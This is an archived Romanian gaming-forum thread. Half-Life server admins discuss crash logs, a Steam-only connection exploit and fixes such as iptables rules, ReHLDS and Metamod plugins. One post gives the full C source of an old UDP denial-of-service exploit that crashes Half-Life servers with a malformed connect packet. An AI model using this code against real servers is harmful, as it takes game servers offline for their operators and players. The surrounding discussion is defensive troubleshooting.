PDA

View Full Version : Steam Only Exploit



pwpx2
27-12-2016, 05:41 PM
De curand am inceput sa las un server de test si sa permit tot felul de atacuri. Multe nu trec, dar altele da.
Acum cateva minute m-am uitat in console si am vazut ceva de genul.

L 12/27/2016 - 14:52:15: "usFnmcxwEy<12><STEAM_0:1:24174909><>" connected, address "196.65.23.187:56319"
SV_ReadClientMessage: unknown command char (152)
Dropped usFnmcxwEy from server
Reason: Bad command character in client command
Segmentation fault

HLDS-ul e la zi cu updateurile. Din ce imi dau seama e fakeplayers ceva acolo, dar cu alta metoda de atac.

Tiger
27-12-2016, 05:56 PM
Sunt constient de exploit. Din pacate, fara lipsa de alte informatii despre procedura pe care o face, pot doar sa creez un fix temporar care ar rezolva botii sa se mai conecteze la server - dar ar da si multe alarme false jucatoriilor reali.

Daca ai exploit-ul as putea sa-l analizez.

pwpx2
27-12-2016, 06:11 PM
Nu am exploitul, dar mi-a dat o poza.
<b>You have to register to ba able to see this link</b>
Foloseste FileDeath nu stiu ce..
A incercat mai multe chestii, dar la toate a rezistat, doar la asta nu.
Inainte nu foloseam Shieldul, acum l-am pus si i-am zis sa dea din nou sa vad daca mai reuseste.
Posibil sa incerc reHLDS sa vad care-i baiu, dar e posibil unele chestii sa nu-mi mai functioneze.

Tiger
27-12-2016, 06:19 PM
In momentul curent cred ca antiflood-ul la nivel 3/4 ar bloca botul care se conecteaza, dar afecta unii jucatori legitimi.

As putea introduce un nou filtru, ca o rezolvare temporara, dar tot ar fi posibilitatea de a bana jucatori legitimi.


Last edited:

Autentificarea cu SteamID nu se poate realiza decat daca si-a pus contul de Steam real. O rezolvare, posibila, este sa banezi SteamID: STEAM_0:1:24174909 .

Contul acela de Steam ii apartine lui: <b>You have to register to ba able to see this link</b>

pwpx2
27-12-2016, 06:22 PM
Pot sa-i banez si ipul din iptables. Ma gandeam daca e ceva rezolvare. Poate se gaseste vreun maniac cu 100ipuri diferite in acelasi timp sa faca aceeasi chestie.. Hehehe.

Tiger
27-12-2016, 06:56 PM
Daca server-ul este SteamOnly va trebui sa se autentifice cu un Steam real. Facand asta este deja vulnerabil ca poate fi banat usor. :)

Mai grav este la nonSteam. Ma ocup de caz si incerc sa gasesc o solutie cat mai rapid.

raizo11
05-01-2017, 09:26 AM
Nu neaparat va trebui sa te conectezi pe server :D

Fi atent la acest tip de attack

Method 1


Invalid split packet length 4
Invalid split packet length 4
Invalid split packet length 4
Invalid split packet length 4

Method 2


NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2
NET_GetLong: Ignoring duplicated split packet 4 of 1 ( 3 bytes )
Split packet without all 1 parts, part 1 had wrong sequence -1/-2

Method 3


Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)
Malformed packet number (15)

Method 4


A2A_ACK from 89.248.169.9:27005
A2A_ACK from 213.184.105.111:27005
A2A_ACK from 89.248.169.9:27005
A2A_ACK from 213.184.105.111:27005


--------------- Added after 10 minutes ---------------

Acest tip de exploit se poate opri din iptable doar provizoriu ... Singura solutie ReHlds... Acest tip de exploit functioneaza si pe ReHlds dar se poate bloca printr-un metamod

Desi este foarte vechi exploitul nu s-au gasit pana acum modalitati pentru al opri :



*/
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>


int startWinsock(void)
{
**WSADATA wsa;
**return WSAStartup(MAKEWORD(2,0),&wsa);
}

int main(int argc, char *argv[])
{
**long rc;
**SOCKET s,s2,s3,s4;
**SOCKADDR_IN addr;
**SOCKADDR_IN remoteAddr;
**char buf[256];
**char challenge[256];
**int remoteAddrLen=sizeof(SOCKADDR_IN);
**char *connect1a;

**char get[]="\xff"
**"\xff\xff\xff\x67\x65\x74\x63\x68\x61\x6c"
**"\x6c\x65\x6e\x67\x65\x0a\x00";

**char head[]="\xff"
**"\xff\xff\xff\x63\x6f\x6e\x6e\x65\x63\x74"
**"\x20\x34\x36\x20";

**char connect1 []= "\x20"
"\x22\x5c\x70\x72\x6f\x74"
"\x5c\x32\x5c\x75\x6e\x69\x71\x75\x65\x5c"
"\x2d\x31\x5c\x72\x61\x77\x5c"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41"
"\x22" //<---the problem
"\x22\x20\x22\x5c\x6d\x6f\x64"
"\x65\x6c\x5c\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x5c\x74\x6f\x70"
"\x63\x6f\x6c\x6f\x72\x5c\x31\x32\x38\x5c"
"\x62\x6f\x74\x74\x6f\x6d\x63\x6f\x6c\x6f"
"\x72\x5c\x31\x32\x38\x5c\x72\x61\x74\x65"
"\x5c\x39\x39\x39\x39\x2e\x30\x30\x30\x30"
"\x30\x30\x5c\x63\x6c\x5f\x75\x70\x64\x61"
"\x74\x65\x72\x61\x74\x65\x5c\x32\x30\x5c"
"\x63\x6c\x5f\x6c\x77\x5c\x31\x5c\x63\x6c"
"\x5f\x6c\x63\x5c\x31\x5c\x63\x6c\x5f\x64"
"\x6c\x6d\x61\x78\x5c\x31\x32\x38\x5c\x68"
"\x75\x64\x5f\x63\x6c\x61\x73\x73\x61\x75"
"\x74\x6f\x6b\x69\x6c\x6c\x5c\x31\x5c\x6e"
"\x61\x6d\x65\x5c\x74\x65\x73\x74\x22\x0a";

**memset(buf,0,strlen(buf));
**memset(challenge,0,strlen(challenge));
**
**
**

**if (argc<3)
**{
****printf("\n%s <Remote host> <Remote port>\n", argv[0]);
****exit(1);
**}

**else
**{
**printf("Denial-of-Service exploit against half-life servers version 3.1.1.0\n");
**printf("Found and coded by Delikon | 7.4.03 | <b>You have to register to ba able to see this link</b> | ich@delikon.de \n");
**
**}


**rc=startWinsock();

**if(rc!=0)

**{

****printf("Error : startWinsock, error code: %d\n",rc);
****return 1;

**}

**

**s=socket(AF_INET,SOCK_DGRAM,0);

**if(s==INVALID_SOCKET)
**{
****printf("Error: couldn't create the socket , error code: %d\n",WSAGetLastError());
****return 1;
**}
**

****addr.sin_family=AF_INET;
**addr.sin_addr.s_addr =inet_addr(argv[1]);
**addr.sin_port=htons(atoi(argv[2]));
**
**


**
**rc=sendto(s,get,strlen(get),0,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
**if(rc==SOCKET_ERROR)
**{
****printf("Fehler: sendto, fehler code: %d\n",WSAGetLastError());
****return 1;
**}
**rc=recvfrom(s,buf,256,0,(SOCKADDR*)&remoteAddr,&remoteAddrLen);

**strcpy(challenge,buf+14);
**challenge[strlen(challenge)-3]='\0';
**printf("Challenge:%s\n",challenge);
**closesocket(s);
**
*

***connect1a=(char *)malloc (sizeof(head)+sizeof(challenge)+sizeof(connect1));
**strcpy(connect1a,head);
**strcat(connect1a,challenge);
**strcat(connect1a,connect1);
**
**

**
**s2=socket(AF_INET,SOCK_DGRAM,0);
**rc=sendto(s2,connect1a,strlen(connect1a),0,(SOCK ADDR*)&addr,sizeof(SOCKADDR_IN));
**Sleep(120);
**closesocket(s2);

**
**s3=socket(AF_INET,SOCK_DGRAM,0);
**rc=sendto(s3,connect1a,strlen(connect1a),0,(SOCK ADDR*)&addr,sizeof(SOCKADDR_IN));
**Sleep(120);
**closesocket(s3);
**
**
**s4=socket(AF_INET,SOCK_DGRAM,0);
**rc=sendto(s4,connect1a,strlen(connect1a),0,(SOCK ADDR*)&addr,sizeof(SOCKADDR_IN));
**Sleep(120);
**closesocket(s4);
**
**printf("\n\n Server is down!!! ??? or ?? check it ;-)\n\n");
**
**exit(1);
}

Tiger
05-01-2017, 12:33 PM
Esti pe langa subiect, ai prins un "exploit" din greseala de la Skillartz. Nu ai exploit-ul pentru Steam-Only.

Metoda 1,2,3 se datoreaza unor pachete corupte. Mesajele se realizeaza datorita functiilor NET_QueuePacket si NET_GetLong (apelata tot de NET_QueuePacket).

Metoda 4 nu este un exploit, spameaza doar consola - daca te conectezi de mai multe ori - face lag. Ea poate fi oprita usor din SV_ConnectionlessPacket.

Ceea ce mi-ai dat tu este un vechi exploit HL Headnut (se vede ca inca folosea p46) - exploit rezolvat de Valve - necesita conectare - poate fi oprita din SV_ConnectClient.

ReHLDS nu este singura solutie, tu o preferi pe aia ca sunt mai multe bug-uri de care tu ai putea sa te folosesti. Toate de mai sus se pt rezolva si cu Orpheu sau cu un plugin Metamod.

Cum spuneam, esti pe langa subiect.

raizo11
05-01-2017, 02:33 PM
Am ultimul dproto si wargods shield pe server .... Nu conteaza steam only sau fake steam deodata ce exploitul nu trimite un bot pe server.. Nu ai ce opri din orpheu singura solutie este iptables hex
string ... te poti uita aici <b>You have to register to ba able to see this link</b>

Am vrut doar sa ajut dar vad ca ma iei in banana... Nu exista packet sender by skillardsHd asa cum nu exista Wargods Anti cheat

Exista numai packet sender by kohtep asa cum exista UCP anti cheat

Good Bye